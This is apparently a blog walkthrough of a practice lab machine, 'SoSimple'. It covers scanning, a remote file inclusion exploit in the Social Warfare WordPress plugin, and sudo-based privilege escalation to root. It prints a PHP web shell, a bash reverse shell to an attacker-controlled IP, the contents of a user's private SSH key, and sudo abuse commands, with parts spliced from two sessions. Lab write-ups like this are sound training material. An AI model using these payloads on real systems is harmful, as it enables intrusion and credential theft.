pg-sosimple-play

Exploitation Guide for SoSimple
Summary

This machine is exploited via a remote code execution vulnerability in the Social Warfare WordPress plugin. It is escalated by leaking a private SSH key of a user, followed by abusing misconfigured sudo permissions.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~# sudo nmap 192.168.120.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 22:51 EDT
Nmap scan report for 192.168.120.192
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Dirb

Using dirb, we can brute force web directories to reveal /wordpress

kali@kali:~# dirb http://192.168.120.192/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 21 22:54:51 2020
URL_BASE: http://192.168.120.192/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.120.192/ ----
+ http://192.168.120.192/index.html (CODE:200|SIZE:495)
+ http://192.168.120.192/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.120.192/wordpress/
...

Web Enumeration

Our next step is to run wpscan to see if we can identify any vulnerabilities and any usernames.

kali@kali:~# wpscan --url http://192.168.120.192/wordpress/ --enumerate p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.120.192/wordpress/ [192.168.120.192]
[+] Started: Fri Aug 21 23:27:01 2020

Interesting Finding(s):

...

[+] social-warfare
| Location: http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2020-08-18T17:05:00.000Z
| [!] The version is out of date, the latest version is 4.1.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.120.192/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt

We can see wpscan identified the social-warfare plugin and the version detected is 3.5.0.
Exploitation
Social Warfare Remote Code Execution

Searching for Social Warfare on Exploit Database we find this entry detailing a Remote File Inclusion vulnerability in the plugin.

To exploit the plugin we will first create the following PHP web shell and save it as payload.txt

<pre>system($_REQUEST[‘cmd’])</pre>

Next we need to host this file over HTTP as follows.

kali@kali:~# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

We can now download and run the exploit, appending &cmd=id to run our command.

kali@kali:~# python exploit.py -t http://192.168.120.192/wordpress/ –payload-uri http://kali/payload.txt\&cmd\=id
[>] Sending Payload to System!
[*] Received Response From Server!
[<] Received:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

.

┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ cat payload.txt
<pre>system("bash -c 'bash -i >& /dev/tcp/192.168.49.207/8080 0>&1'")</pre>

┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.207.78 - - [23/Sep/2021 10:25:49] "GET /payload.txt?swp_debug=get_user_options HTTP/1.0" 200 -

Then we visit logged in to wordpress as max ! http://192.168.207.78/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.207/payload.txt

and use Netcat handler to catch the shell.

┌──(kali㉿puckie)-[~/offsec]
└─$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.78] 53318
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$

Escalation
Weak File Permissions

We’ll start our enumeration by investigating what files max has in his home folder.

www-data@so-simple:/home/max$ ls -la
ls -la
total 52
drwxr-xr-x 7 max max 4096 Aug 22 2020 .
drwxr-xr-x 4 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 max max 9 Aug 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3810 Jul 12 2020 .bashrc
drwx------ 2 max max 4096 Jul 12 2020 .cache
drwx------ 3 max max 4096 Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4096 Jul 12 2020 .local
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4096 Jul 14 2020 .ssh
-rw-r--r-- 1 max max 33 Sep 23 14:04 local.txt
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4096 Jul 12 2020 this
-rwxr-x--- 1 max max 43 Aug 22 2020 user.txt
www-data@so-simple:/home/max$

However, the other one looks legitimate, so we’ll copy it to our Kali machine.

www-data@so-simple:/home/max$ cat .ssh/id_rsa
cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
www-data@so-simple:/home/max$

We can then login as max using the private key.

kali@kali:~# ssh -i id_rsa max@192.168.120.192
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
...
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$

Sudo Abuse

To get root access we’ll first see if max has access to run anything with sudo.

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service

It looks like we can run /usr/sbin/service as steven without needing a password. If we look at the entry for service on GTFOBins we can exploit this to get a shell as steven

max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

Continuing down this path we’ll check if steven can run anything with sudo as well.

steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh

It appears we can run a script located in /opt/tools/server-health.sh as root without requiring a password. If we try and access this file we find that it doesn’t exist.

steven@so-simple:/$ ls -lah /opt/tools/server-health.sh
ls: cannot access '/opt/tools/server-health.sh': No such file or directory
steven@so-simple:/$ ls -lah /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -lah /opt
total 8.0K
drwxr-xr-x 2 steven steven 4.0K Jul 13 21:06 .
drwxr-xr-x 20 root root 4.0K Aug 14 10:57 ..

Fortunately, it looks like steven has write access to /opt so we can simply create the file and then execute it as root

steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ echo "/bin/bash" > /opt/tools/server-health.sh
steven@so-simple:/$ chmod +x /opt/tools/server-health.sh
steven@so-simple:/$ sudo /opt/tools/server-health.sh
root@so-simple:/# id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/#

Explained

root@so-simple:/home/max# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
#%sudo ALL=(ALL:ALL) ALL
max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
root@so-simple:/home/max#

.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *